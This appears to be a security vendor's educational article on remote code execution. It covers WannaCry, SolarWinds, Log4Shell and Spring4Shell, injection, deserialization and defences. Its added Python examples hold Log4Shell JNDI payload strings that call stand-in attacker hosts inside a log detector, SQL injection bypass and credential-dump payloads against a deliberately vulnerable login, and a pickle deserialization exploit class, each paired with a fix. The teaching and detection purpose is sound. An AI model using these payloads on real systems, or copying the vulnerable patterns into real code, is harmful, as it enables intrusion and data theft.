The Continuing Rise of Remote Code Execution


There were nearly 29,000 vulnerabilities published in 2023, over 3,800 more common vulnerabilities and exposures (CVEs) than were issued in 2022. More troubling than the sheer volume is that over half of them were given a CVSS score indicating high or critical severity, an increase of 57% year over year.

However, not all vulnerabilities become go-to attack vectors for cybercriminals. For security teams already stretched too thin, a proactive vulnerability management plan that patches or otherwise remediates every vulnerability is out of reach. The objective for most IT and security teams, then, becomes prioritization based on risk and business goals. And when it comes to the vulnerabilities most dangerous to an organization’s cybersecurity, one type has risen to the forefront: remote code execution (RCE).

In fact, according to Arctic Wolf Labs, nine of the top 10 vulnerabilities of 2023 were RCEs. These nine vulnerabilities were found in 42% of all incidents responded to by Arctic Wolf and, with the continued adoption of the cloud and the ubiquity of hybrid work models, we only expect these types of vulnerabilities to grow in number and severity. Clearly, RCEs are having a moment, and their continued rise poses real cyber risk to organizations across the globe.

What is Remote Code Execution?

Remote code execution gives an attacker the ability to run code of their choosing on a process or device from across a network, often directly from the internet, without physical access to the system. It is a subset of arbitrary code execution (ACE), the general term for any flaw that lets an attacker execute code they control. What makes an ACE flaw an RCE is that the trigger is reachable remotely: the malicious input arrives over a network protocol (an HTTP request, an SMB packet, a logged header) instead of requiring the attacker to already be on the host. A locally triggered ACE, by contrast, needs an existing foothold such as a low-privileged account or a user who opens a malicious file, and is typically used for privilege escalation rather than initial access.

Once an attacker successfully exploits an RCE vulnerability, they can potentially take complete control over the target system, allowing them to steal sensitive data, disrupt operations, or launch further attacks.

Infamous RCE Attacks

WannaCry
Perhaps the most infamous of all ransomware strains, WannaCry brought ransomware into the mainstream in May 2017. The WannaCry ransomware worm spread by exploiting a vulnerability in Microsoft’s implementation of version 1 of the Server Message Block (SMB) protocol (CVE-2017-0144, the flaw behind the leaked EternalBlue exploit; Microsoft had released the MS17-010 patch two months earlier). A crafted SMB packet from the network allowed an attacker to execute malicious code on vulnerable machines with no user interaction, which is what let the ransomware propagate on its own and then access and encrypt valuable files. WannaCry affected more than 200,000 Windows computers in 150 countries. It was especially dangerous, and potentially deadly, because hospitals in the UK’s National Health Service were among the most severely affected. The Five Eyes alliance (Australia, Canada, New Zealand, the United Kingdom, and the United States) attributed the attack to North Korean threat actors.

SolarWinds
In one of the most significant breaches of 2020, the Russian SVR compromised SolarWinds’ software build process and inserted a backdoor (SUNBURST) into signed updates of the SolarWinds Orion Platform. This was a supply-chain attack rather than the exploitation of a flaw in Orion itself, but the effect was that of an RCE: the trojanized update gave the attackers the ability to run code of their choosing inside an estimated 18,000 private and government-affiliated networks that installed it. From that position they selected a much smaller set of high-value targets for hands-on follow-on activity, gaining access to source code, credentials, email, and other sensitive data.

Log4j / Log4Shell
In early December 2021, Log4Shell (CVE-2021-44228) was disclosed as a zero-day remote code execution vulnerability in Apache Log4j 2. An unauthenticated, remote threat actor could exploit the flaw by sending a request containing a JNDI lookup string, such as ${jndi:ldap://attacker-host/a}, in any field the application logged: a User-Agent header, a username, a search parameter. When Log4j wrote the message it resolved the lookup, connected to the attacker’s server, and loaded and executed the Java class it returned. Because Log4j 2 is embedded in a vast number of Java applications and appliances, many organizations did not know they were exposed. Arctic Wolf Labs observed one in four organizations in our customer base were targeted with Log4Shell exploitation attempts between January and December of 2022. Log4Shell exploitation was the root point of compromise in 11% of all Arctic Wolf® Incident Response cases in 2022 for customers whose incident response engagement was their first with Arctic Wolf.
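The following Python snippet is an added example, not code from Arctic Wolf or from the Log4j project. It shows why matching the literal string "${jndi:" in logs missed many real attempts, and how a detector can first collapse the nested-lookup obfuscation that Log4j itself would have resolved, then match. The log lines are constructed; the resolver handles only the lower, upper, and ${name:-default} forms (Log4j has more lookups, so treat a clean result as triage, not proof of absence); the IP addresses are documentation placeholders.

```python
import re

# Constructed web-server access log lines (not real traffic). Lines 2-5 carry
# Log4Shell probes; lines 3-5 use nesting tricks that evade a naive "${jndi:" match.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://198.51.100.7/t}"',
    '10.0.0.2 - - "GET /price?q=${cost} HTTP/1.1" 200 "curl/7.81"',
]

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are looking for once the obfuscation is gone: scheme and callback host.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _resolve(match):
    """Resolve one innermost lookup the way Log4j 2.x would have before logging it."""
    body = match.group(1)
    key = body.lower()
    if key.startswith("jndi:"):
        return match.group(0)              # this is the lookup we want to keep and find
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${lookup:key:-default}: assume the lookup fails (attackers pick bogus keys
        # on purpose), so Log4j substitutes the default text.
        return body.split(":-", 1)[1]
    return match.group(0)                  # unknown lookup: leave untouched


def normalize_lookups(text, max_rounds=20):
    """Collapse inner lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved
    return text


def find_jndi(line):
    """Return (scheme, host) if the line carries a JNDI lookup after normalization."""
    match = _JNDI.search(normalize_lookups(line))
    if not match:
        return None
    return match.group(1).lower(), match.group(2)


def scan(lines):
    """Return [(line_number, scheme, host), ...] for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = find_jndi(line)
        if found:
            hits.append((number, found[0], found[1]))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print("line %d: jndi via %s to %s" % hit)
```

Every hit yields the attacker's callback scheme and host, which is what you pivot on in firewall and DNS logs to learn whether the vulnerable host actually made the outbound connection (a blocked egress connection is a probe; a completed one is a compromise until proven otherwise). Detection is not a fix: remediation is upgrading Log4j 2 to a fixed release (2.17.1 or later) or, where that is impossible, removing the JndiLookup class from the jar.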

Spring4Shell
In late March 2022, Spring published a security advisory confirming Spring4Shell, a remote code execution (RCE) vulnerability in the Spring Framework, and released patches addressing it. The vulnerability, assigned CVE-2022-22965, received a critical severity rating. Notably, it impacted not only Spring MVC but also Spring WebFlux applications running on JDK 9+. The exploit that circulated publicly also required the application to be deployed as a WAR on Apache Tomcat, but Spring cautioned that other paths to the flaw might exist, so upgrading was recommended regardless of deployment style. Threat actors leveraged the vulnerability to deploy cryptominers and botnet malware into environments.

How Remote Code Execution Works

RCE vulnerabilities allow an attacker to execute arbitrary code on a remote system. This means that an attacker can gain unauthorized access to a system and execute commands or run programs remotely, without having or needing physical access to the target system.

RCE has become such a popular vulnerability class to exploit because it gives threat actors initial access to a target network without an identity-based step, such as phishing or other social engineering, to obtain valid credentials first. With RCE, the attacker enters without relying on credentials at all; the code runs with the permissions of the exploited service. A service running as root or SYSTEM therefore hands over the host immediately, while one running under a dedicated low-privileged account forces the attacker into a further privilege-escalation step, which is one reason least privilege for internet-facing services matters.

There are several ways a threat actor can achieve remote code execution, including:

Injection
An injection flaw lets untrusted input be interpreted as part of a command or query rather than as plain data. SQL injection is the best-known form: the threat actor supplies input that the application concatenates into a database query, and the database executes the attacker’s clauses as SQL. That can bypass the application’s authentication and authorization, read the entire database, and add, modify, or delete data. It becomes a path to code execution when the database can reach the operating system (for example MSSQL’s xp_cmdshell, or file-write primitives used to drop a web shell), and operating-system command injection, where input is spliced into a shell command, gives code execution directly.
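As an added example (not the page’s own code), the two query styles below run against a constructed in-memory SQLite table. The first concatenates the user’s input into the statement and can be turned into an authentication bypass or a full table dump; the second passes the input as a bound parameter, so the database never interprets it as SQL. Passwords are stored in the clear here only to keep the demo short; a real application stores password hashes.

```python
import sqlite3


def setup_db():
    """Constructed demo database (plaintext passwords for brevity only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct-horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    # Input is spliced into the statement text, so a quote character and the
    # SQL comment marker (--) let the caller rewrite the rest of the query.
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    # Bound parameters: the driver sends the values separately from the
    # statement, so they can only ever be compared as data.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


# Constructed attacker inputs.
BYPASS = "' OR 1=1 --"                                   # log in as the first row
DUMP = "' UNION SELECT username, password FROM users --"  # exfiltrate credentials


def demo():
    """Run both attacks against both implementations and return the rows each gives back."""
    conn = setup_db()
    return {
        "legit": login_safe(conn, "bob", "hunter2"),
        "bypass_vulnerable": sorted(login_vulnerable(conn, BYPASS, "wrong")),
        "dump_vulnerable": sorted(login_vulnerable(conn, DUMP, "wrong")),
        "bypass_safe": login_safe(conn, BYPASS, "wrong"),
        "dump_safe": login_safe(conn, DUMP, "wrong"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The same separation of code from data at the API level (parameterized queries, argument arrays instead of shell strings, template engines with auto-escaping) is the fix for LDAP, XPath, command, and template injection as well; stripping "dangerous characters" is not. What turns SQL injection into remote code execution is the database’s own reach into the OS, so run the application’s database account with the least privilege it needs and leave features such as xp_cmdshell disabled.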

Insecure Deserialization
Serialization is the transformation of an object, say a file folder, into a format that can be preserved, stored, and transmitted, much in the way a .zip file lets you send a folder containing multiple files as a single unit. Deserialization reverses that transformation so the object can be used again. The danger lies in deserializers that reconstruct whatever class the serialized bytes name and run that class’s reconstruction logic: Java’s ObjectInputStream, Python’s pickle, PHP’s unserialize, and .NET’s BinaryFormatter all behave this way. If an application deserializes data an attacker can supply or tamper with, the attacker can craft an object whose reconstruction executes their code. What matters is integrity (the receiver must be able to reject bytes it did not produce) and restricting which classes may be instantiated; encryption without authentication provides neither. Because such endpoints are often reachable before any login, this flaw frequently yields unauthenticated RCE.
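The following Python example is added here and is not from the original page. It uses Python’s pickle format, whose unpickler, like Java’s ObjectInputStream, will call whatever callable the serialized bytes name. The demo payload calls the builtin exec to set an environment variable, where a real exploit would call os.system; the HMAC key is a placeholder; and the hardened loader combines an integrity check with an allowlist of the one class this hypothetical application legitimately deserializes.

```python
import hashlib
import hmac
import io
import os
import pickle

# Assumed server-side key; in production this comes from a secrets manager.
SECRET_KEY = b"demo-key-replace-me"


class EvilPayload:
    """Serializes as 'call builtins.exec with this string', not as data."""

    def __reduce__(self):
        # A real payload would run os.system("...") or spawn a reverse shell;
        # this one only sets an environment variable so the effect is observable.
        return (exec, ("import os; os.environ['RCE_DEMO'] = 'executed'",))


class SessionData:
    """The only type this hypothetical application legitimately serializes."""

    def __init__(self, user, role):
        self.user = user
        self.role = role


def load_vulnerable(blob):
    # pickle.loads imports and calls whatever global the bytes name.
    return pickle.loads(blob)


def sign(blob):
    """Prefix the serialized bytes with an HMAC so tampering or forgery is detectable."""
    return hmac.new(SECRET_KEY, blob, hashlib.sha256).digest() + blob


class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED = {(SessionData.__module__, "SessionData")}

    def find_class(self, module, name):
        # Called for every class or function reference in the stream.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_safe(signed_blob):
    mac, blob = signed_blob[:32], signed_blob[32:]
    expected = hmac.new(SECRET_KEY, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("integrity check failed")
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo():
    """Run the attack against both loaders and report what happened."""
    os.environ.pop("RCE_DEMO", None)
    evil = pickle.dumps(EvilPayload())
    results = {}
    load_vulnerable(evil)
    results["vulnerable"] = os.environ.get("RCE_DEMO")     # 'executed': attacker code ran
    try:
        load_safe(evil)                                     # no valid MAC: never unpickled
    except ValueError as err:
        results["unsigned"] = str(err)
    try:
        load_safe(sign(evil))                               # signed, still blocked by allowlist
    except pickle.UnpicklingError as err:
        results["signed_evil"] = str(err)
    session = load_safe(sign(pickle.dumps(SessionData("alice", "user"))))
    results["legit"] = (session.user, session.role)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label}: {outcome}")
```

Two layers are deliberate: the MAC stops forged or tampered blobs from reaching the deserializer at all, and the restricted unpickler limits the damage if the key leaks or the blob was signed by a compromised peer. Where possible, prefer a data-only format such as JSON and build objects explicitly from it; that removes the bug class rather than fencing it in.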

Out-of-Bounds Write
In this exploit, a threat actor takes advantage of a missing or incorrect bounds check to write data past the end of a buffer (a fixed-size region of memory holding data while it is being processed). The excess bytes overwrite whatever sits next to the buffer: a return address on the stack, a function pointer, or heap metadata. Controlling that value lets the attacker redirect execution to code or instruction sequences of their choosing. This class is specific to memory-unsafe languages such as C and C++; mitigations such as stack canaries, non-executable memory, and address-space layout randomization raise the cost of exploitation but do not remove the bug.

Improper Input Validation
When an application does not validate or sanitize untrusted input, attackers can feed it data that the system later treats as code. Common shapes are a file upload that is really a web shell and lands in a directory the web server executes scripts from, a parameter spliced into an operating-system command, or an expression evaluated by a template engine. The application runs the attacker’s code believing it handled valid input.

The important thing to note is that remote code execution is possible in any software, regardless of programming language or operating system. Memory-safe languages eliminate the memory-corruption variants but do nothing against injection, deserialization, and input-validation flaws, which is why the Java and web-application RCEs above exist at all. This breadth is another reason RCE exploits have risen so sharply in the past few years, with no signs of slowing down.

How To Defend Against Remote Code Execution

One of the primary ways to prevent RCE is through timely software updates and patches. As vulnerabilities are discovered, vendors release updates or patches, and keeping software and applications current reduces the risk of RCE. Speed matters for internet-facing services: Log4Shell was being exploited within hours of public disclosure, and WannaCry spread through machines that were missing a two-month-old patch.

Another effective, and more proactive, method of preventing RCE is a vulnerability management program. A large share of the critical-severity CVEs published each year are RCEs, so it is important to scan for vulnerabilities in your environment, prioritize those that are remotely exploitable, already exploited in the wild, or exposed to the internet, and stay on top of your patching schedule.

Because every organization has different security and business needs that can change, the goal with vulnerability management should not be to eliminate every possible vulnerability, but to take a risk-based approach that reduces risk over time.

The reality is you can’t patch every vulnerability that appears. However, a regular patching process combined with proactive vulnerability management makes a major difference to your security architecture and reduces the risk of a breach. Where a patch cannot be applied immediately, compensating controls limit what a successful RCE can reach: remove the service from direct internet exposure, run it with least privilege, segment it from the rest of the network, and monitor it for exploitation attempts.

When To Partner With a Third-Party

Many IT and security teams struggle under a lack of budget and a shortage of available security experts, meaning that providing 24×7 monitoring of their entire environment, as well as prompt detection and response, is already a great challenge. Viewed through that lens, adding proactive vulnerability and risk management to that workload is a non-starter.

That’s when partnering with a security operations solutions provider can provide valuable assistance in determining your organization’s unique risk appetite — the amount of risk you’re willing to take on to conduct business — as well as patching and mitigating the vulnerabilities that are most dangerous to your organization.

A managed security operations provider like Arctic Wolf® not only provides 24×7 monitoring, detection, and response from a seasoned team of security experts, but can also discover and assess the risks in your environment by contextualizing your attack surface coverage across your networks, endpoints, and cloud environments, helping you implement effective vulnerability management while improving your security posture.

Learn more about the vulnerabilities your organization needs to look out for in The Arctic Wolf Labs 2024 Threats Report.

Arctic Wolf

Arctic Wolf provides your team with 24x7 coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.